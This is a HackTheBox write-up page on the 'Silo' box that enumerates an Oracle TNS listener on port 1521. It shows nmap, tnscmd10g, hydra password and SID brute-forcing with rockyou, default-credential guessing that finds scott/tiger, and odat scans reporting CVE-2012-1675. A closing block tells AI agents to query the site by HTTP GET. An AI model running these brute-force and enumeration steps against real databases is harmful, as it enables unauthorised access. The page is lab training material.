# 4 :1521 orcale tns listener ``` $ nmap --script "oracle-tns-version" -p 1521 -T4 -sV silo.htb PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) # checking with tnscmd10g $ tnscmd10g status -h silo.htb sending (CONNECT_DATA=(COMMAND=status)) to silo.htb:1521 writing 89 bytes reading .a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4)))) # more information about error codes | https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7 # if TNS versions are incompatible using --10G flag $ tnscmd10g status -h silo.htb --10G sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to silo.htb:1521 writing 181 bytes reading .e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4)))) # listener could not authenticate the user. # trying to crack the user:pass using hashcat $ hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 silo.htb oracle-listener # PREFER RUNNING odat tnscmd -s silo.htb -p 1521 --[command] $ odat tnscmd -s silo.htb -p 1521 --version [1] (10.10.10.82:1521): Searching the version of the Oracle database server (10.10.10.82) listening on the port 1521 [+] The remote database version is: '11.2.0.2.0.' # vulnerable to offline bruteforce # sid enumeration $ odat sidguesser -s "silo.htb" -p 1521 [--sids-file=/opt/oracle-tns/sids-oracle.txt] [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... [+] 'XEXDB' is a valid SID. Continue... [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB $ hydra -L /opt/oracle-tns/sids-oracle.txt -s 1521 silo.htb oracle-sid [1521][oracle-sid] host: silo.htb [1521][oracle-sid] host: silo.htb login: CLRExtProc [1521][oracle-sid] host: silo.htb login: PLSExtProc [1521][oracle-sid] host: silo.htb login: XE 1 of 1 target successfully completed, 4 valid passwords found # time to find out user:pass # using 0xdf's script $ python oracle-userpass-brute.py silo.htb oracle_default_userpass.txt # needs wordlist in format user:pass Found scott / tiger [OR] # needs wordlist in format user/pass $ sudo odat passwordguesser -s silo.htb -p 1521 -d 'XE' --accounts-file $(pwd)/oracle_default_userpass.txt [--sysdba] # we can run automatd odat scan $ odat all -s silo.htb -d XE -U SCOTT -P tiger --sysdba [1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)? [+] The target is vulnerable to a remote TNS poisoning [truncated] # alot of more information Using https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests # also https://0xdf.gitlab.io/img/ODAT_main_features_v2.0.jpg ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/silo/4-1521-orcale-tns-listener.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.